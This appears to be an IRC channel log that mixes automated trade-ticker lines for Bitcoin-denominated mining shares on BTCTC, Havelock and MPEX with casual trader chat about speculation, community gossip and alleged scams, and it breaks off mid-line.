[BTCTC] [ACTIVEMINING] 1 @ 0.008746 BTC [-] Jul 30 05:35:01 [BTCTC] [ACTIVEMINING] 107 @ 0.008735 = 0.9346 BTC [-] Jul 30 05:36:04 [BTCTC] [ACTIVEMINING] 25 @ 0.008736 = 0.2184 BTC [+] Jul 30 05:36:07 [BTCTC] [ACTIVEMINING] 275 @ 0.008735 = 2.4021 BTC [-] Jul 30 05:39:38 [BTCTC] [ACTIVEMINING] 25 @ 0.008737 = 0.2184 BTC [+] Jul 30 05:39:40 [BTCTC] [ACTIVEMINING] 50 @ 0.008736 = 0.4368 BTC [-] Jul 30 05:39:41 [BTCTC] [ACTIVEMINING] 925 @ 0.008734 = 8.079 BTC [-] Jul 30 05:43:29 [BTCTC] [BASIC-MINING] 1 @ 0.4201 BTC [-] Jul 30 05:44:51 [BTCTC] [COGNITIVE] 1 @ 0.5275 BTC [-] Jul 30 05:45:38 [BTCTC] [ACTIVEMINING] 25 @ 0.008981 = 0.2245 BTC [+] Jul 30 05:45:40 [BTCTC] [ACTIVEMINING] 17 @ 0.008982 = 0.1527 BTC [+] Jul 30 05:46:40 [MPEX] [S.MPOE] 8400 @ 0.00080924 = 6.7976 BTC [+] Jul 30 05:52:50 [BTCTC] [TAT.MINIGAME] 1 @ 0.000281 BTC [-] Jul 30 05:52:52 [BTCTC] [TAT.MINIGAME] 2399 @ 0.00028 = 0.6717 BTC [-] Jul 30 05:53:50 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002875 = 0.0575 BTC [+] Jul 30 05:54:28 [BTCTC] [TAT.MINIGAME] 175 @ 0.0002875 = 0.0503 BTC [+] Jul 30 05:55:01 [BTCTC] [TAT.MINIGAME] 15 @ 0.0002875 = 0.0043 BTC [+] Jul 30 05:56:01 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002875 = 0.2875 BTC [+] Jul 30 05:57:30 So what do you think of volcanic's reaction? Jul 30 05:58:28 he didnt link his portfolio did he? Jul 30 05:59:05 Nope just acted like a victim. Jul 30 05:59:26 I'm still going to try for the. 01 and move on from there Jul 30 06:00:02 The whole speculation did a lot of damage to the share, or at least slowed down the momentum Jul 30 06:00:22 What a bunch of dumbness Jul 30 06:00:49 [BTCTC] [TAT.MINIGAME] 1 @ 0.000286 BTC [-] Jul 30 06:00:51 [BTCTC] [TAT.MINIGAME] 909 @ 0.0002875 = 0.2613 BTC [+] Jul 30 06:00:53 it could be argued that owning shares in the first place includes more than enough of that Jul 30 06:01:21 ThickAsThieves: what's the stats on what we talked about with bonds? Jul 30 06:01:30 [BTCTC] [ACTIVEMINING] 47 @ 0.008981 = 0.4221 BTC [-] Jul 30 06:01:33 [BTCTC] [ACTIVEMINING] 13 @ 0.008981 = 0.1168 BTC [-] Jul 30 06:02:12 [BTCTC] [TAT.MINIGAME] 10 @ 0.000288 = 0.0029 BTC [+] Jul 30 06:02:27 There was money to be made and trust me, lots was made. Jul 30 06:03:02 [BTCTC] [TAT.MINIGAME] 17 @ 0.000288 = 0.0049 BTC [+] Jul 30 06:03:34 [BTCTC] [TAT.MINIGAME] 600 @ 0.000288 = 0.1728 BTC [+] Jul 30 06:03:35 O well Jul 30 06:03:45 Time to look at lab coin. Jul 30 06:03:54 sure but you can't expect rational actions Jul 30 06:04:15 [BTCTC] [TAT.MINIGAME] 700 @ 0.000288 = 0.2016 BTC [+] Jul 30 06:04:35 [BTCTC] [TAT.MINIGAME] 20 @ 0.000288 = 0.0058 BTC [+] Jul 30 06:04:45 [BTCTC] [TAT.MINIGAME] 500 @ 0.000288 = 0.144 BTC [+] Jul 30 06:05:21 [BTCTC] [TAT.MINIGAME] 17 @ 0.000288 = 0.0049 BTC [+] Jul 30 06:05:26 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000288 = 0.288 BTC [+] Jul 30 06:05:40 [BTCTC] [TAT.MINIGAME] 300 @ 0.000288 = 0.0864 BTC [+] Jul 30 06:06:07 You always have to be ready for it sooner or later. Jul 30 06:06:18 [BTCTC] [TAT.MINIGAME] 50 @ 0.000288 = 0.0144 BTC [+] Jul 30 06:06:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008979 = 0.2245 BTC [-] Jul 30 06:06:50 [BTCTC] [TAT.MINIGAME] 100 @ 0.000288 = 0.0288 BTC [+] Jul 30 06:07:43 Due to the increased profile of partner dances during the 2000s, taxi dancing has become more common in settings where partners are in short supply—this involves both male and female dancers. For example, male dancers are often employed on cruise ships to dance with single female passengers. Jul 30 06:07:50 now we know what goats do on boats. Jul 30 06:08:33 Interesting Jul 30 06:08:45 they chew the cud Jul 30 06:11:31 [HAVELOCK] [AM100] 10 @ 0.0422 = 0.422 BTC [-] Jul 30 06:12:03 I wonder what happened to usagi Jul 30 06:12:14 at which point in his life? Jul 30 06:14:25 lol Jul 30 06:14:59 Diablo-D3 here's my version : smart kid grew up among retards/us public schooling. as a result he'd love to do stuff and be useful but he has not the means to even begin to understand how that'd go. Jul 30 06:15:17 so he gets real excited over having discovered how to make arbitrary length gpg keys and wants to market this to halp ppl. Jul 30 06:15:24 [BTCTC] [ASICMINER-PT] 1 @ 4.311 BTC [-] Jul 30 06:15:28 no I meant Jul 30 06:15:29 where is he Jul 30 06:15:38 behind you Jul 30 06:15:45 I have my back to the wall Jul 30 06:15:52 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 30 06:16:24 Diablo-D3: usagi is the wall Jul 30 06:16:41 sure seems like it sometimes Jul 30 06:18:49 [BTCTC] [ACTIVEMINING] 955 @ 0.00899 = 8.5855 BTC [+] Jul 30 06:20:04 [HAVELOCK] [SMG] 2000 @ 0.00026999 = 0.54 BTC [+] Jul 30 06:20:37 [BTCTC] [TAT.MINIGAME] 4 @ 0.0002875 = 0.0012 BTC [-] Jul 30 06:21:36 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 30 06:21:58 [BTCTC] [ACTIVEMINING] 975 @ 0.008979 = 8.7545 BTC [-] Jul 30 06:24:13 [BTCTC] [ACTIVEMINING] 50 @ 0.008988 = 0.4494 BTC [+] Jul 30 06:24:56 [BTCTC] [ACTIVEMINING] 397 @ 0.008989 = 3.5686 BTC [+] Jul 30 06:25:51 [BTCTC] [ACTIVEMINING] 1 @ 0.00899 BTC [+] Jul 30 06:26:22 [BTCTC] [ACTIVEMINING] 44 @ 0.00899 = 0.3956 BTC [+] Jul 30 06:28:06 [BTCTC] [ACTIVEMINING] 478 @ 0.008996 = 4.3001 BTC [+] Jul 30 06:29:26 [HAVELOCK] [SDSTM] 1 @ 0.0089 BTC [-] Jul 30 06:29:29 [HAVELOCK] [SDSTM] 1 @ 0.0088 BTC [-] Jul 30 06:29:31 [HAVELOCK] [SDSTM] 1 @ 0.0087 BTC [-] Jul 30 06:29:33 [HAVELOCK] [SDSTM] 1 @ 0.0086 BTC [-] Jul 30 06:29:35 [HAVELOCK] [SDSTM] 4 @ 0.0085 = 0.034 BTC [-] Jul 30 06:29:38 [HAVELOCK] [SDSTM] 1 @ 0.0082 BTC [-] Jul 30 06:29:40 [HAVELOCK] [SDSTM] 1170 @ 0.0082 = 9.594 BTC [-] Jul 30 06:29:43 [BTCTC] [ASICMINER-PT] 3 @ 4.4 = 13.2 BTC [+] Jul 30 06:32:13 [HAVELOCK] [AM100] 20 @ 0.0422 = 0.844 BTC [-] Jul 30 06:33:04 [HAVELOCK] [AM100] 27 @ 0.0422 = 1.1394 BTC [-] Jul 30 06:39:26 ActM is sucking the life out of other stocks Jul 30 06:39:40 everyone wants the gem Jul 30 06:39:54 [BTCTC] [ACTIVEMINING] 4 @ 0.008996 = 0.036 BTC [+] Jul 30 06:42:26 [HAVELOCK] [AM100] 10 @ 0.0427898 = 0.4279 BTC [+] Jul 30 06:43:06 ThickAsThieves sure puts the "market evaluation" of asicminer in perspective. Jul 30 06:43:57 puts a lot in perspective Jul 30 06:45:36 there are many differnt types of sick, demented animals in this marketplace. Jul 30 06:45:44 they're Jul 30 06:46:00 eh Jul 30 06:46:02 some perspective for ya'll: Jul 30 06:46:08 "Well, there's been essentially nothing but positive news and it looks like a lot of people are taking to the idea of ActM becoming the next AsicM. The money is just pouring in. " Jul 30 06:46:09 "Take some time to look back a few pages and you'll see some price projections that'll make your trousers tight. Bear in mind this is all optimistic speculation, but at least it's speculation that seems to have been given some decent thought." Jul 30 06:46:31 lol Jul 30 06:46:34 lol Jul 30 06:46:34 heh but still no news yet? Jul 30 06:46:47 it hurts to look at Jul 30 06:47:44 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002231 = 0.2231 BTC [-] Jul 30 06:47:46 [BTCTC] [TAT.VIRTUALMINE] 123 @ 0.002231 = 0.2744 BTC [-] Jul 30 06:47:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00223 BTC [-] Jul 30 06:47:50 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00221 = 0.0199 BTC [-] Jul 30 06:47:52 [BTCTC] [TAT.VIRTUALMINE] 66 @ 0.00211 = 0.1393 BTC [-] Jul 30 06:48:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.04321 = 0.0864 BTC [+] Jul 30 06:49:29 [BTCTC] [BASIC-MINING] 1 @ 0.4684 BTC [+] Jul 30 06:50:23 [BTCTC] [ACTIVEMINING] 390 @ 0.008996 = 3.5084 BTC [+] Jul 30 06:50:26 [BTCTC] [ACTIVEMINING] 1 @ 0.008996 BTC [+] Jul 30 06:50:34 lmao Jul 30 06:50:51 ThickAsThieves and then they say the girl is mean. Jul 30 06:51:11 [BTCTC] [BASIC-MINING] 1 @ 0.4799 BTC [+] Jul 30 06:51:22 optimistic speculation, the woodchipper's best friend Jul 30 06:52:41 vaguely related, Jul 30 06:52:42 http://trilema.com/2013/of-horses-and-sunglasses-of-illiterate-fakers/ Jul 30 06:52:48 Of Horses And Sunglasses ; Of Illiterate Fakers pe Trilema - Un blog de Mircea Popescu. Jul 30 06:54:06 [BTCTC] [KENILWORTH] 1 @ 0.001713 BTC [+] Jul 30 06:54:12 [BTCTC] [KENILWORTH] 13 @ 0.001712 = 0.0223 BTC [-] Jul 30 06:58:03 [BTCTC] [BFMINES] 90 @ 0.003896 = 0.3506 BTC [+] Jul 30 06:58:05 [BTCTC] [BFMINES] 50 @ 0.003897 = 0.1949 BTC [+] Jul 30 07:01:44 [HAVELOCK] [AM100] 1 @ 0.0422 BTC [-] Jul 30 07:03:46 goat i have no idea Jul 30 07:03:58 dont recall if it was even a decision Jul 30 07:04:05 just didnt do it Jul 30 07:04:18 but you have a funnt way of asking... Jul 30 07:04:57 obv i did trust you Jul 30 07:05:16 no sir Jul 30 07:06:33 all was just fine, thank you Jul 30 07:08:17 [BTCTC] [BITVPS] 10 @ 0.001857 = 0.0186 BTC [-] Jul 30 07:08:19 [BTCTC] [BITVPS] 1 @ 0.001857 BTC [-] Jul 30 07:08:33 [MPEX] [S.MPOE] 13083 @ 0.00080496 = 10.5313 BTC [-] Jul 30 07:09:25 [BTCTC] [S.BBET-PT] 100 @ 0.001919 = 0.1919 BTC [-] Jul 30 07:13:07 [BTCTC] [TAT.MINIGAME] 4 @ 0.000287 = 0.0011 BTC [-] Jul 30 07:14:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002111 BTC [+] Jul 30 07:29:05 Chaang-Noi: got your boat ready to sail? Jul 30 07:30:51 but btc is illegal in thailand Jul 30 07:31:01 how does it feel to be a criminal? Jul 30 07:31:41 [BTCTC] [ACTIVEMINING] 97 @ 0.008989 = 0.8719 BTC [-] Jul 30 07:32:41 [BTCTC] [ACTIVEMINING] 3 @ 0.008911 = 0.0267 BTC [-] Jul 30 07:32:42 [BTCTC] [ACTIVEMINING] 1 @ 0.0089 BTC [-] Jul 30 07:32:52 if you aint ever been to the ghetto Jul 30 07:32:59 dont ever come to the ghetto Jul 30 07:33:04 [BTCTC] [DMS.MINING] 140 @ 0.0099 = 1.386 BTC [+] Jul 30 07:33:08 cuz you wouldnt understand the ghetto Jul 30 07:33:23 so stay the f%$# out of the ghetto Jul 30 07:33:31 doo doo do do doooo do do do Jul 30 07:33:39 [BTCTC] [COGNITIVE] 1 @ 0.5548 BTC [+] Jul 30 07:33:52 yes and I was quoting NWA Jul 30 07:34:01 sorry Jul 30 07:34:04 not NWA Jul 30 07:34:10 Naughty by Nature Jul 30 07:35:08 Chaang-Noi: have you sold any bfl singles? Jul 30 07:35:15 http://www.youtube.com/watch?v=j7VD5UpAXPo Jul 30 07:35:16 Everythings Gonna Be Alright Naughty (ghetto bastard) By Nature - YouTube Jul 30 07:35:28 classic Jul 30 07:35:59 how much? Jul 30 07:36:16 ouch Jul 30 07:36:23 you got shafted Jul 30 07:38:03 yeah Jul 30 07:38:24 you're lucky the scam didnt implode on you thoug Jul 30 07:38:50 nah, thinking of selling Jul 30 07:39:24 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 30 07:39:27 you're mining the avalon chips? Jul 30 07:39:51 right Jul 30 07:40:07 and sorry to hear Jul 30 07:40:31 I heard avalon scam imploded already Jul 30 07:41:07 dub the nghzxyk guy is the most ethical being in bitcoin. Jul 30 07:41:26 [BTCTC] [ACTIVEMINING] 700 @ 0.0089 = 6.23 BTC [-] Jul 30 07:41:36 of course, he did that one thing once remember Jul 30 07:42:20 yeah. Jul 30 07:42:33 honestly, i don't recall any thing to have ever entertained me to the degree Jul 30 07:42:37 this bitcoin thing so far has. Jul 30 07:42:42 bitcoin > de funes. Jul 30 07:44:40 [MPEX] [S.MPOE] 691 @ 0.00080496 = 0.5562 BTC [-] Jul 30 07:44:42 [MPEX] [S.MPOE] 24050 @ 0.00080323 = 19.3177 BTC [-] Jul 30 07:44:53 [MPEX] [S.MPOE] 8559 @ 0.00080254 = 6.8689 BTC [-] Jul 30 07:50:20 [BTCTC] [ACTIVEMINING] 350 @ 0.008989 = 3.1462 BTC [+] Jul 30 07:50:22 [BTCTC] [ACTIVEMINING] 1000 @ 0.00899 = 8.99 BTC [+] Jul 30 07:50:27 [BTCTC] [ACTIVEMINING] 500 @ 0.00899 = 4.495 BTC [+] Jul 30 07:50:50 [BTCTC] [ASICMINER-PT] 1 @ 4.388 BTC [+] Jul 30 07:50:52 [BTCTC] [ASICMINER-PT] 1 @ 4.414 BTC [+] Jul 30 08:02:51 so cog will announce a new 60 gh/s unit soon? :p Jul 30 08:07:06 [BTCTC] [ACTIVEMINING] 2146 @ 0.008996 = 19.3054 BTC [+] Jul 30 08:11:07 [BTCTC] [ACTIVEMINING] 165 @ 0.00911 = 1.5032 BTC [+] Jul 30 08:11:08 [BTCTC] [ACTIVEMINING] 635 @ 0.009198 = 5.8407 BTC [+] Jul 30 08:17:45 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 30 08:18:01 [MPEX] [S.MPOE] 8491 @ 0.00080254 = 6.8144 BTC [-] Jul 30 08:18:03 [MPEX] [S.MPOE] 1609 @ 0.00080211 = 1.2906 BTC [-] Jul 30 08:25:37 [BTCTC] [ACTIVEMINING] 365 @ 0.009198 = 3.3573 BTC [+] Jul 30 08:27:15 too bad Jul 30 08:27:17 [BTCTC] [ACTIVEMINING] 100 @ 0.009199 = 0.9199 BTC [+] Jul 30 08:27:46 [MPEX] [S.MPOE] 8591 @ 0.00080211 = 6.8909 BTC [-] Jul 30 08:27:48 [MPEX] [S.MPOE] 12050 @ 0.00080178 = 9.6614 BTC [-] Jul 30 08:27:54 [MPEX] [S.MPOE] 4226 @ 0.00080127 = 3.3862 BTC [-] Jul 30 08:28:01 [MPEX] [S.MPOE] 12467 @ 0.00079981 = 9.9712 BTC [-] Jul 30 08:30:34 [BTCTC] [ACTIVEMINING] 17 @ 0.009199 = 0.1564 BTC [+] Jul 30 08:35:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.04321 BTC [+] Jul 30 08:37:17 [BTCTC] [ASICMINER-PT] 4 @ 4.41 = 17.64 BTC [+] Jul 30 08:43:08 [BTCTC] [TAT.MINIGAME] 1 @ 0.000287 BTC [-] Jul 30 08:43:36 [BTCTC] [TAT.MINIGAME] 13 @ 0.000287 = 0.0037 BTC [-] Jul 30 08:49:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.0429 = 0.1716 BTC [-] Jul 30 08:49:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0429 BTC [-] Jul 30 08:49:56 [BTCTC] [ACTIVEMINING] 25 @ 0.008933 = 0.2233 BTC [-] Jul 30 08:49:58 [BTCTC] [ACTIVEMINING] 25 @ 0.008932 = 0.2233 BTC [-] Jul 30 08:50:48 [BTCTC] [ACTIVEMINING] 25 @ 0.008933 = 0.2233 BTC [+] Jul 30 08:50:50 [BTCTC] [ACTIVEMINING] 25 @ 0.008932 = 0.2233 BTC [-] Jul 30 08:51:32 [BTCTC] [ACTIVEMINING] 50 @ 0.008932 = 0.4466 BTC [-] Jul 30 08:51:50 [BTCTC] [DMS.SELLING] 14 @ 0.0204 = 0.2856 BTC [-] Jul 30 08:56:52 [BTCTC] [DMS.PURCHASE] 4 @ 0.03162 = 0.1265 BTC [-] Jul 30 08:57:34 [BTCTC] [ACTIVEMINING] 14 @ 0.008939 = 0.1251 BTC [+] Jul 30 08:58:28 [BTCTC] [ACTIVEMINING] 25 @ 0.009196 = 0.2299 BTC [+] Jul 30 08:58:29 [BTCTC] [ACTIVEMINING] 50 @ 0.009197 = 0.4599 BTC [+] Jul 30 08:58:31 [BTCTC] [ACTIVEMINING] 125 @ 0.009199 = 1.1499 BTC [+] Jul 30 08:58:35 [BTCTC] [GSDPT] 70 @ 0.003353 = 0.2347 BTC [-] Jul 30 09:03:39 [BTCTC] [ACTIVEMINING] 25 @ 0.009198 = 0.23 BTC [-] Jul 30 09:03:41 [BTCTC] [ACTIVEMINING] 58 @ 0.009199 = 0.5335 BTC [+] Jul 30 09:03:43 [BTCTC] [ACTIVEMINING] 140 @ 0.0092 = 1.288 BTC [+] Jul 30 09:06:35 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002875 = 0.0575 BTC [+] Jul 30 09:11:05 [BTCTC] [TAT.MINIGAME] 2296 @ 0.0002875 = 0.6601 BTC [+] Jul 30 09:14:00 [MPEX] [S.MG] 2500 @ 0.0002675 = 0.6688 BTC [+] Jul 30 09:14:59 [BTCTC] [TAT.MINIGAME] 204 @ 0.0002875 = 0.0587 BTC [+] Jul 30 09:15:33 [BTCTC] [ACTIVEMINING] 25 @ 0.009109 = 0.2277 BTC [-] Jul 30 09:15:34 [BTCTC] [ACTIVEMINING] 123 @ 0.009108 = 1.1203 BTC [-] Jul 30 09:15:35 [BTCTC] [ACTIVEMINING] 50 @ 0.009106 = 0.4553 BTC [-] Jul 30 09:15:37 [BTCTC] [ACTIVEMINING] 171 @ 0.0091 = 1.5561 BTC [-] Jul 30 09:15:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.04289 BTC [-] Jul 30 09:15:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.04289 = 2.1445 BTC [-] Jul 30 09:15:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.0429 = 0.1287 BTC [+] Jul 30 09:15:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.04312 BTC [+] Jul 30 09:15:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.04321 = 0.0864 BTC [+] Jul 30 09:17:39 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.002287 = 0.0069 BTC [+] Jul 30 09:22:16 [BTCTC] [ACTIVEMINING] 25 @ 0.0091 = 0.2275 BTC [-] Jul 30 09:22:18 [BTCTC] [ACTIVEMINING] 50 @ 0.009101 = 0.4551 BTC [+] Jul 30 09:22:19 [BTCTC] [ACTIVEMINING] 15 @ 0.009103 = 0.1365 BTC [+] Jul 30 09:22:50 [BTCTC] [ACTIVEMINING] 25 @ 0.009107 = 0.2277 BTC [+] Jul 30 09:22:52 [BTCTC] [ACTIVEMINING] 238 @ 0.009106 = 2.1672 BTC [-] Jul 30 09:26:27 [BTCTC] [ACTIVEMINING] 1 @ 0.009245 BTC [+] Jul 30 09:27:44 [BTCTC] [ACTIVEMINING] 25 @ 0.009001 = 0.225 BTC [-] Jul 30 09:28:27 [BTCTC] [ACTIVEMINING] 24 @ 0.009245 = 0.2219 BTC [+] Jul 30 09:32:15 [BTCTC] [DMS.PURCHASE] 15 @ 0.03162 = 0.4743 BTC [-] Jul 30 09:33:47 [BTCTC] [TAT.MINIGAME] 2796 @ 0.0002875 = 0.8039 BTC [+] Jul 30 09:33:49 [BTCTC] [TAT.MINIGAME] 2054 @ 0.000288 = 0.5916 BTC [+] Jul 30 09:35:33 [BTCTC] [ASICMINER-PT] 1 @ 4.399 BTC [-] Jul 30 09:35:50 [BTCTC] [ACTIVEMINING] 1 @ 0.009241 BTC [-] Jul 30 09:37:37 [BTCTC] [ACTIVEMINING] 50 @ 0.009057 = 0.4529 BTC [-] Jul 30 09:37:39 [BTCTC] [ACTIVEMINING] 37 @ 0.009056 = 0.3351 BTC [-] Jul 30 09:45:59 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002385 = 0.0048 BTC [+] Jul 30 09:50:48 [BTCTC] [DMS.SELLING] 1 @ 0.02169 BTC [+] Jul 30 09:51:23 [HAVELOCK] [AM100] 1 @ 0.041 BTC [-] Jul 30 09:53:26 [BTCTC] [TAT.MINIGAME] 1 @ 0.000282 BTC [-] Jul 30 09:53:28 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002753 = 0.2753 BTC [-] Jul 30 09:53:30 [BTCTC] [TAT.MINIGAME] 299 @ 0.0002752 = 0.0823 BTC [-] Jul 30 09:54:52 [MPEX] [S.MPOE] 9198 @ 0.00080353 = 7.3909 BTC [+] Jul 30 09:55:15 [BTCTC] [DMS.MINING] 1 @ 0.00999 BTC [+] Jul 30 10:01:45 [BTCTC] [ACTIVEMINING] 25 @ 0.009187 = 0.2297 BTC [+] Jul 30 10:01:47 [BTCTC] [ACTIVEMINING] 145 @ 0.009188 = 1.3323 BTC [+] Jul 30 10:01:49 [BTCTC] [ACTIVEMINING] 50 @ 0.009189 = 0.4595 BTC [+] Jul 30 10:01:51 [BTCTC] [ACTIVEMINING] 3290 @ 0.00919 = 30.2351 BTC [+] Jul 30 10:01:52 [BTCTC] [ACTIVEMINING] 1490 @ 0.009194 = 13.6991 BTC [+] Jul 30 10:04:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002385 BTC [+] Jul 30 10:08:09 [MPEX] [S.MPOE] 702 @ 0.00080353 = 0.5641 BTC [+] Jul 30 10:08:26 [BTCTC] [DMS.SELLING] 10 @ 0.02169 = 0.2169 BTC [+] Jul 30 10:08:27 [MPEX] [S.MPOE] 1814 @ 0.0008061 = 1.4623 BTC [+] Jul 30 10:08:30 [BTCTC] [DMS.MINING] 10 @ 0.00999 = 0.0999 BTC [+] Jul 30 10:16:24 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002385 = 0.0119 BTC [+] Jul 30 10:25:58 [BTCTC] [COGNITIVE] 2 @ 0.5291 = 1.0582 BTC [-] Jul 30 10:26:00 [BTCTC] [COGNITIVE] 1 @ 0.5291 BTC [-] Jul 30 10:26:04 [BTCTC] [COGNITIVE] 1 @ 0.5291 BTC [-] Jul 30 10:26:06 [BTCTC] [COGNITIVE] 3 @ 0.529 = 1.587 BTC [-] Jul 30 10:26:14 [BTCTC] [COGNITIVE] 1 @ 0.528 BTC [-] Jul 30 10:26:32 [BTCTC] [ASICMINER-PT] 1 @ 4.397 BTC [-] Jul 30 10:26:46 [BTCTC] [ACTIVEMINING] 25 @ 0.009027 = 0.2257 BTC [-] Jul 30 10:31:56 [BTCTC] [COGNITIVE] 1 @ 0.525 BTC [-] Jul 30 10:32:18 [BTCTC] [COGNITIVE] 1 @ 0.52 BTC [-] Jul 30 10:32:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.04321 = 0.0864 BTC [+] Jul 30 10:32:24 [BTCTC] [COGNITIVE] 2 @ 0.511 = 1.022 BTC [-] Jul 30 10:32:48 [BTCTC] [COGNITIVE] 1 @ 0.51 BTC [-] Jul 30 10:33:08 [BTCTC] [COGNITIVE] 2 @ 0.505 = 1.01 BTC [-] Jul 30 10:33:11 [BTCTC] [COGNITIVE] 1 @ 0.502 BTC [-] Jul 30 10:33:15 [BTCTC] [COGNITIVE] 1 @ 0.5015 BTC [-] Jul 30 10:33:17 [BTCTC] [COGNITIVE] 2 @ 0.5011 = 1.0022 BTC [-] Jul 30 10:33:20 [BTCTC] [COGNITIVE] 3 @ 0.501 = 1.503 BTC [-] Jul 30 10:38:52 [HAVELOCK] [AM100] 2 @ 0.041 = 0.082 BTC [-] Jul 30 10:38:55 [HAVELOCK] [AM100] 1 @ 0.0409 BTC [-] Jul 30 10:38:56 [HAVELOCK] [AM100] 1 @ 0.0408 BTC [-] Jul 30 10:38:58 [HAVELOCK] [AM100] 3 @ 0.0407 = 0.1221 BTC [-] Jul 30 10:39:00 [HAVELOCK] [AM100] 2 @ 0.0405 = 0.081 BTC [-] Jul 30 10:39:02 [HAVELOCK] [AM100] 15 @ 0.04045008 = 0.6068 BTC [-] Jul 30 10:39:05 [HAVELOCK] [AM100] 31 @ 0.04045 = 1.254 BTC [-] Jul 30 10:39:07 [HAVELOCK] [AM100] 75 @ 0.0403001 = 3.0225 BTC [-] Jul 30 10:39:19 [BTCTC] [ACTIVEMINING] 25 @ 0.009097 = 0.2274 BTC [+] Jul 30 10:39:21 [BTCTC] [ACTIVEMINING] 50 @ 0.009098 = 0.4549 BTC [+] Jul 30 10:39:23 [BTCTC] [ACTIVEMINING] 50 @ 0.0091 = 0.455 BTC [+] Jul 30 10:40:25 [BTCTC] [ACTIVEMINING] 10 @ 0.0091 = 0.091 BTC [+] Jul 30 10:41:16 [BTCTC] [ACTIVEMINING] 13 @ 0.0091 = 0.1183 BTC [+] Jul 30 10:42:17 [BTCTC] [DMS.MINING] 20 @ 0.009002 = 0.18 BTC [-] Jul 30 10:43:15 [BTCTC] [DMS.MINING] 113 @ 0.009001 = 1.0171 BTC [-] Jul 30 10:50:51 [BTCTC] [BFMINES] 40 @ 0.004 = 0.16 BTC [+] Jul 30 10:57:04 [BTCTC] [ACTIVEMINING] 25 @ 0.008844 = 0.2211 BTC [-] Jul 30 10:57:36 [BTCTC] [ACTIVEMINING] 12 @ 0.008843 = 0.1061 BTC [-] Jul 30 10:57:40 [BTCTC] [ACTIVEMINING] 113 @ 0.008826 = 0.9973 BTC [-] Jul 30 10:57:46 [HAVELOCK] [AM1] 2 @ 4.58 = 9.16 BTC [-] Jul 30 11:02:01 so apparently theymos fell off a something or the other ? Jul 30 11:02:16 quitting btctalk etc ? Jul 30 11:08:20 wat Jul 30 11:12:26 didn't quit Jul 30 11:12:43 [BTCTC] [S.MPOE-PT] 4 @ 0.0009405 = 0.0038 BTC [-] Jul 30 11:12:48 just injured Jul 30 11:13:47 i predict drama. Jul 30 11:14:31 camping trip turned bad. like ironcross360 lawl Jul 30 11:14:52 what happend to ironcross360? Jul 30 11:15:56 14 year old, banned for trolling Jul 30 11:16:11 i know Jul 30 11:16:56 he is actually involved in more Jul 30 11:17:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.04321 = 0.2161 BTC [+] Jul 30 11:17:49 [HAVELOCK] [AM100] 8 @ 0.0403001 = 0.3224 BTC [-] Jul 30 11:30:37 [BTCTC] [ACTIVEMINING] 25 @ 0.008871 = 0.2218 BTC [+] Jul 30 11:30:39 [BTCTC] [ACTIVEMINING] 37 @ 0.00887 = 0.3282 BTC [-] Jul 30 11:30:41 [BTCTC] [ACTIVEMINING] 1 @ 0.00886 BTC [-] Jul 30 11:30:43 [BTCTC] [ACTIVEMINING] 272 @ 0.008826 = 2.4007 BTC [-] Jul 30 11:30:45 [BTCTC] [ACTIVEMINING] 45 @ 0.008825 = 0.3971 BTC [-] Jul 30 11:30:46 [BTCTC] [ACTIVEMINING] 500 @ 0.008823 = 4.4115 BTC [-] Jul 30 11:30:47 [BTCTC] [ACTIVEMINING] 1458 @ 0.008803 = 12.8348 BTC [-] Jul 30 11:31:20 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [-] Jul 30 11:31:22 [BTCTC] [ASICMINER-PT] 1 @ 4.397 BTC [+] Jul 30 11:31:24 [BTCTC] [ASICMINER-PT] 1 @ 4.398 BTC [+] Jul 30 11:31:26 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 30 11:31:28 [BTCTC] [ASICMINER-PT] 1 @ 4.414 BTC [+] Jul 30 11:31:30 [BTCTC] [ASICMINER-PT] 1 @ 4.418 BTC [+] Jul 30 11:31:32 [BTCTC] [ASICMINER-PT] 1 @ 4.439 BTC [+] Jul 30 11:31:35 [BTCTC] [ASICMINER-PT] 3 @ 4.44 = 13.32 BTC [+] Jul 30 11:36:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.04321 = 0.0864 BTC [+] Jul 30 11:40:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.009039 = 9.039 BTC [+] Jul 30 11:41:11 [BTCTC] [ASICMINER-PT] 1 @ 4.449 BTC [+] Jul 30 11:41:22 [MPEX] [S.MPOE] 2692 @ 0.0008061 = 2.17 BTC [+] Jul 30 11:41:24 [MPEX] [S.MPOE] 3350 @ 0.00080656 = 2.702 BTC [+] Jul 30 11:41:37 [MPEX] [S.MPOE] 9850 @ 0.00080888 = 7.9675 BTC [+] Jul 30 11:41:39 [MPEX] [S.MPOE] 11216 @ 0.00080924 = 9.0764 BTC [+] Jul 30 11:44:28 [BTCTC] [ACTIVEMINING] 25 @ 0.008909 = 0.2227 BTC [-] Jul 30 11:44:47 [BTCTC] [DMS.MINING] 25 @ 0.009896 